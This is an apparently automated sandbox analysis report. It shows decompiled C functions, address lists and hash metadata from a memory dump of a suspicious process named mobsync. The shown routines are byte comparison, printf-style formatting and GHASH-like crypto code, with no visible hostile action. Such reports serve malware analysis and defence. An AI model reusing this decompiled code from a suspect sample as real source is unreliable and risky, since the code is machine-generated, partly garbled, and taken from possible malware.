												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}

0x004335cd
0x004335cd
0x004335cd
0x004335d3
0x0043365a
0x0043365c
0x0043365e
0x004339dd
0x004339dd
0x004347ce
0x004347ce
0x00433664
0x0043366a
0x004336f1
0x004336f3
0x004336f5
0x00000000
0x00000000
0x004336fb
0x00433701
0x00433788
0x0043378a
0x0043378c
0x00000000
0x00000000
0x00433792
0x00433798
0x0043381f
0x00433821
0x00433823
0x00000000
0x00000000
0x0043382f
0x004338b7
0x004338b9
0x004338bb
0x00000000
0x00000000
0x004338c1
0x004338c7
0x0043394e
0x00433950
0x00433952
0x00000000
0x00000000
0x00433958
0x0043395e
0x004339d5
0x004339d7
0x004339d9
0x004339db
0x004339db
0x00000000
0x004339d9
0x00433967
0x00433969
0x0043397d
0x00433985
0x00433987
0x0043399b
0x004339a3
0x004339a5
0x004339b9
0x004339c1
0x004339c3
0x004339cc
0x004339cc
0x00000000
0x004339c3
0x004339ae
0x004339b7
0x00000000
0x00000000
0x00000000
0x004339b7
0x00433990
0x00433999
0x00000000
0x00000000
0x00000000
0x00433999
0x00433972
0x0043397b
0x00000000
0x00000000
0x00000000
0x0043397b
0x004338d4
0x004338d6
0x004338ee
0x004338f6
0x004338f8
0x00433910
0x00433918
0x0043391a
0x00433932
0x0043393a
0x0043393c
0x00433945
0x00433945
0x00000000
0x0043393c
0x00433923
0x0043392c
0x00000000
0x00000000
0x00000000
0x0043392c
0x00433901
0x0043390a
0x00000000
0x00000000
0x00000000
0x0043390a
0x004338df
0x004338e8
0x00000000
0x00000000
0x00000000
0x004338e8
0x0043383d
0x0043383f
0x00433857
0x0043385f
0x00433861
0x00433879
0x00433881
0x00433883
0x0043389b
0x004338a3
0x004338a5
0x004338ae
0x004338ae
0x00000000
0x004338a5
0x0043388c
0x00433895
0x00000000
0x00000000
0x00000000
0x00433895
0x0043386a
0x00433873
0x00000000
0x00000000
0x00000000
0x00433873
0x00433848
0x00433851
0x00000000
0x00000000
0x00000000
0x00433851
0x004337a5
0x004337a7
0x004337bf
0x004337c7
0x004337c9
0x004337e1
0x004337e9
0x004337eb
0x00433803
0x0043380b
0x0043380d
0x00433816
0x00433816
0x00000000
0x0043380d
0x004337f4
0x004337fd
0x00000000
0x00000000
0x00000000
0x004337fd
0x004337d2
0x004337db
0x00000000
0x00000000
0x00000000
0x004337db
0x004337b0
0x004337b9
0x00000000
0x00000000
0x00000000
0x004337b9
0x0043370e
0x00433710
0x00433728
0x00433730
0x00433732
0x0043374a
0x00433752
0x00433754
0x0043376c
0x00433774
0x00433776
0x0043377f
0x0043377f
0x00000000
0x00433776
0x0043375d
0x00433766
0x00000000
0x00000000
0x00000000
0x00433766
0x0043373b
0x00433744
0x00000000
0x00000000
0x00000000
0x00433744
0x00433719
0x00433722
0x00000000
0x00000000
0x00000000
0x00433722
0x00433677
0x00433679
0x00433691
0x00433699
0x0043369b
0x004336b3
0x004336bb
0x004336bd
0x004336d5
0x004336dd
0x004336df
0x004336e8
0x004336e8
0x00000000
0x004336df
0x004336c6
0x004336cf
0x00000000
0x00000000
0x00000000
0x004336cf
0x004336a4
0x004336ad
0x00000000
0x00000000
0x00000000
0x004336ad
0x00433682
0x0043368b
0x00000000
0x00000000
0x00000000
0x0043368b
0x004335e0
0x004335e2
0x004335fa
0x00433602
0x00433604
0x0043361c
0x00433624
0x00433626
0x0043363e
0x00433646
0x00433648
0x00433651
0x00433651
0x00000000
0x00433648
0x0043362f
0x00433638
0x00000000
0x00000000
0x00000000
0x00433638
0x0043360d
0x00433616
0x00000000
0x00000000
0x00000000
0x00433616
0x004335eb
0x004335f4
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 11d1cc8f6c72931ed22098a6d1e3200ef5e8d1ea02e48ad23b97b6c290659dce
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 6DC1D57220509389DF2D4A3AC43513FBAA15EA57B371A275FE4F3CB2C0EE18D624D614

Uniqueness

Uniqueness Score: -1.00%

Function 004378EC, Relevance: .2, Instructions: 214
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E004378EC(intOrPtr* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				intOrPtr* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00438709(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E00436A21(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															L00438B8B(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E00436A21(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E004389B2(_t95, _t119, _t116, _t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E00436A21(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E00438514(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E004386F1(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00438120(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E0043865E(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E004386D2(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E0043805A(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E004383EC(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x004378f1
0x004378f4
0x004378f8
0x004378fb
0x004378ff
0x00437902
0x00437970
0x00437973
0x004379c2
0x004379c2
0x004379c5
0x00437932
0x00437934
0x00437939
0x0043793b
0x004379e0
0x004379e4
0x004379ed
0x004379f2
0x004379f3
0x004379f7
0x004379f9
0x004379fe
0x00437a01
0x00437a03
0x00437a2c
0x00437a2c
0x00437a2f
0x00437a32
0x00437a39
0x00437a3b
0x00437a3e
0x00437a40
0x00437a44
0x00437a44
0x00437a47
0x00437a52
0x00437a52
0x00437a54
0x00437a54
0x00437a56
0x00437a5c
0x00437a5c
0x00437a61
0x00437a64
0x00437a6f
0x00437a6f
0x00437a71
0x00437a71
0x00437a7c
0x00437a80
0x00437a80
0x00437a83
0x00437a89
0x00437a8b
0x00437a8e
0x00437a9e
0x00437aa3
0x00437aa3
0x00437ab8
0x00437abd
0x00437ac0
0x00437ac5
0x00437ac8
0x00437aca
0x00437acc
0x00437acf
0x00437ad2
0x00437adf
0x00437ae4
0x00437ae4
0x00437ad2
0x00437aeb
0x00437af0
0x00437af3
0x00437af8
0x00437afb
0x00437afd
0x00437b0a
0x00437b0f
0x00437afd
0x00437b12
0x00437b15
0x00437b1a
0x00437b1a
0x00437a66
0x00437a69
0x00000000
0x00000000
0x00437a6b
0x00000000
0x00437a6b
0x00437a58
0x00437a5a
0x00000000
0x00000000
0x00000000
0x00437a5a
0x00437a49
0x00437a4c
0x00000000
0x00000000
0x00437a4e
0x00000000
0x00437a4e
0x00437a42
0x00437a42
0x00437a42
0x00000000
0x00437a42
0x00437a34
0x00437a37
0x00000000
0x00000000
0x00000000
0x00437a37
0x00437a07
0x00437a0a
0x00437a0c
0x00437a14
0x00437a16
0x00437a20
0x00437a22
0x00437a24
0x00000000
0x00000000
0x00437a26
0x00437a2a
0x00437a2a
0x00000000
0x00437a2a
0x00437a18
0x00000000
0x00437a18
0x00437a0e
0x00000000
0x00437a0e
0x004379e6
0x00000000
0x004379e6
0x00437941
0x00437941
0x00000000
0x00437941
0x004379cc
0x004379cc
0x004379cf
0x004379a1
0x004379a1
0x004379a2
0x004379a4
0x004379a6
0x00000000
0x004379a6
0x004379d1
0x004379d4
0x00000000
0x00000000
0x004379da
0x00437949
0x00437949
0x00000000
0x00437949
0x00437975
0x004379b8
0x00000000
0x004379b8
0x00437977
0x0043797a
0x004379ad
0x004379af
0x00000000
0x004379af
0x0043797c
0x0043797f
0x0043799d
0x0043799d
0x0043799d
0x0043799d
0x00000000
0x0043799d
0x00437981
0x00437984
0x00437996
0x00000000
0x00437996
0x00437986
0x00437989
0x00000000
0x00000000
0x0043798d
0x00000000
0x0043798d
0x00437904
0x00000000
0x00000000
0x0043790a
0x0043790d
0x0043794d
0x0043794d
0x00437950
0x00437969
0x00000000
0x00437969
0x00437952
0x00437952
0x00437955
0x00000000
0x00000000
0x00437958
0x0043795b
0x00000000
0x00000000
0x0043795d
0x00437960
0x00000000
0x00437960
0x0043790f
0x00437948
0x00000000
0x00437948
0x00437914
0x00000000
0x00000000
0x0043791d
0x00000000
0x00000000
0x00437922
0x00000000
0x00000000
0x00437927
0x00000000
0x00000000
0x00437930
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 734bcd308261c39c15bc3b1bbc171b3f1001009be4a085e5c990ae6d9ed5feda
Instruction ID: ab90482ec5b8001f41a3b8eff9a413c500260345fcb068109aab72220f129e22
Opcode Fuzzy Hash: 734bcd308261c39c15bc3b1bbc171b3f1001009be4a085e5c990ae6d9ed5feda
Instruction Fuzzy Hash: 095134E024C64556FF34996884967BF67899F0E314F183A0FE5C297382D50DAE06C25E

Uniqueness

Uniqueness Score: -1.00%

Function 004229F0, Relevance: .2, Instructions: 195
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E004229F0(void* __ecx, signed int __edx, signed int _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v64;
				unsigned int _t115;
				signed int _t146;
				unsigned int _t147;
				unsigned int _t149;
				unsigned int _t150;
				signed int* _t156;
				signed int _t160;
				signed int _t169;
				signed int _t179;

				_v12 = __edx;
				asm("xorps xmm0, xmm0");
				asm("movsd");
				asm("movlpd [ebp-0x1c], xmm0");
				asm("movlpd [ebp-0x14], xmm0");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00421C57( &_v64,  &_v64);
				_t146 = _a4;
				if(_t146 == 0) {
					L7:
					_t147 = _a12;
					if(_t147 == 0) {
						L15:
						_t179 = _a4;
						_v28 = _v28 ^ (0 << 0x00000020 | _t179) << 0x3;
						_v20 = _v20 ^ (0 << 0x00000020 | _t147) << 0x3;
						_t156 =  &_v32;
						_v32 = _v32 ^ _t179 << 0x00000003;
						_v24 = _v24 ^ _t147 << 0x00000003;
						E004228AD(_t156,  &_v64);
						_push(_t156);
						L00421C57( &_v32,  &_v32);
						return L00431DF0(_a16,  &_v32, _a20);
					}
					_t183 = _a8;
					if(_a8 == 0) {
						goto L15;
					}
					_t160 = _t147 & 0x0000000f;
					_t115 = _t147 >> 4;
					_v12 = _t160;
					if(_t115 == 0) {
						L13:
						if(_t160 != 0) {
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							L00431DF0( &_v48, _t183, _t160);
							L00421C57( &_v48,  &_v48);
							_v32 = _v32 ^ _v48;
							_v28 = _v28 ^ _v44;
							_v24 = _v24 ^ _v40;
							_v20 = _v20 ^ _v36;
							E004228AD( &_v32,  &_v64);
						}
						goto L15;
					}
					_t149 = _t115;
					do {
						_push(_t160);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						L00421C57( &_v48,  &_v48);
						_v32 = _v32 ^ _v48;
						_v28 = _v28 ^ _v44;
						_v24 = _v24 ^ _v40;
						_v20 = _v20 ^ _v36;
						_t160 =  &_v32;
						E004228AD(_t160,  &_v64);
						_t183 = _a8 + 0x10;
						_a8 = _a8 + 0x10;
						_t149 = _t149 - 1;
					} while (_t149 != 0);
					_t147 = _a12;
					_t160 = _v12;
					goto L13;
				}
				_t189 = _v12;
				if(_v12 == 0) {
					goto L7;
				}
				_t150 = _t146 >> 4;
				_t169 = _t146 & 0x0000000f;
				_v16 = _t169;
				if(_t150 == 0) {
					L5:
					if(_t169 != 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						L00431DF0( &_v48, _t189, _t169);
						L00421C57( &_v48,  &_v48);
						_v32 = _v32 ^ _v48;
						_v28 = _v28 ^ _v44;
						_v24 = _v24 ^ _v40;
						_v20 = _v20 ^ _v36;
						E004228AD( &_v32,  &_v64);
					}
					goto L7;
				} else {
					goto L3;
				}
				goto L5;
				L3:
				_push(_t169);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00421C57( &_v48,  &_v48);
				_v32 = _v32 ^ _v48;
				_v28 = _v28 ^ _v44;
				_v24 = _v24 ^ _v40;
				_v20 = _v20 ^ _v36;
				_t169 =  &_v32;
				E004228AD(_t169,  &_v64);
				_t189 = _v12 + 0x10;
				_v12 = _v12 + 0x10;
				_t150 = _t150 - 1;
				if(_t150 != 0) {
					goto L3;
				} else {
					_t169 = _v16;
					goto L5;
				}
			}

0x004229ff
0x00422a05
0x00422a08
0x00422a0f
0x00422a14
0x00422a19
0x00422a1a
0x00422a1b
0x00422a1c
0x00422a21
0x00422a27
0x00422ad8
0x00422ad8
0x00422add
0x00422b95
0x00422b95
0x00422ba4
0x00422ba7
0x00422baa
0x00422bb0
0x00422bb9
0x00422bbc
0x00422bc4
0x00422bc7
0x00422be5
0x00422be5
0x00422ae3
0x00422ae8
0x00000000
0x00000000
0x00422af2
0x00422af5
0x00422af8
0x00422afd
0x00422b4d
0x00422b4f
0x00422b56
0x00422b59
0x00422b5a
0x00422b5b
0x00422b60
0x00422b6c
0x00422b77
0x00422b7d
0x00422b83
0x00422b89
0x00422b90
0x00422b90
0x00000000
0x00422b4f
0x00422aff
0x00422b01
0x00422b09
0x00422b0c
0x00422b0d
0x00422b0e
0x00422b0f
0x00422b10
0x00422b1b
0x00422b21
0x00422b27
0x00422b2d
0x00422b31
0x00422b34
0x00422b3c
0x00422b3f
0x00422b42
0x00422b42
0x00422b47
0x00422b4a
0x00000000
0x00422b4a
0x00422a2d
0x00422a32
0x00000000
0x00000000
0x00422a3a
0x00422a3d
0x00422a40
0x00422a45
0x00422a90
0x00422a92
0x00422a99
0x00422a9c
0x00422a9d
0x00422a9e
0x00422aa3
0x00422aaf
0x00422aba
0x00422ac0
0x00422ac6
0x00422acc
0x00422ad3
0x00422ad3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00422a47
0x00422a4f
0x00422a52
0x00422a53
0x00422a54
0x00422a55
0x00422a56
0x00422a61
0x00422a67
0x00422a6d
0x00422a73
0x00422a77
0x00422a7a
0x00422a82
0x00422a85
0x00422a88
0x00422a8b
0x00000000
0x00422a8d
0x00422a8d
0x00000000
0x00422a8d

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3754c8ab1cd89bcf70286c24d2488beb3e0ffe75d9f5e48930e88d9759f94c27
Instruction ID: 1df3ec214639b9ec6a84c051e2f256db1530fecf97633d66247ffaeaade02f9a
Opcode Fuzzy Hash: 3754c8ab1cd89bcf70286c24d2488beb3e0ffe75d9f5e48930e88d9759f94c27
Instruction Fuzzy Hash: 25613131E0021AAFDF08DFB9D4815EFB7F2EF4C304F54852AE525BB250DA746A058B94

Uniqueness

Uniqueness Score: -1.00%

Function 004228AD, Relevance: .1, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E004228AD(signed int* __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int* _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _t81;
				signed int _t83;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t97;
				unsigned int _t101;
				signed int _t105;
				signed int _t106;
				signed int* _t108;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t118;
				signed int _t124;
				signed int _t125;
				signed int _t127;
				signed int _t129;

				asm("xorps xmm0, xmm0");
				_t101 = __ecx[1];
				_t124 = __ecx[2];
				asm("movlpd [ebp-0x30], xmm0");
				_v24 = _v48;
				asm("movlpd [ebp-0x38], xmm0");
				_v20 = _v52;
				_v40 = __edx;
				_t110 = __ecx[3];
				_v44 = __ecx;
				_t105 = 0;
				_v16 = _v56;
				_v8 =  *__ecx;
				_v36 = 0;
				_v12 = _v60;
				do {
					_t81 = _v40;
					_v32 = 0x40;
					_t118 =  *(_t81 + _t105 * 8);
					_v28 =  *((intOrPtr*)(_t81 + 4 + _t105 * 8));
					_t83 = _v8;
					_t106 = _v28;
					do {
						_t129 = _t106;
						if(_t129 <= 0 && (_t129 < 0 || _t118 < 0)) {
							_v12 = _v12 ^ _t83;
							_v16 = _v16 ^ _t101;
							_v20 = _v20 ^ _t124;
							_v24 = _v24 ^ _t110;
						}
						_t87 = _v8;
						if((_t124 & 0x00000001) == 0) {
							_t125 = (_t110 << 0x00000020 | _t124) >> 1;
							_t111 = _t110 >> 1;
							if((_t87 & 0x00000001) == 0) {
								asm("xorps xmm0, xmm0");
								asm("movlpd [ebp-0x30], xmm0");
								_v28 = _v48;
								_t91 = _v52;
							} else {
								_t91 = 0;
								_v28 = 0x80000000;
							}
							_t110 = _t111 | _v28;
							_t124 = _t125 | _t91;
							_t83 = (_t101 << 0x00000020 | _v8) >> 1;
							_t101 = _t101 >> 1;
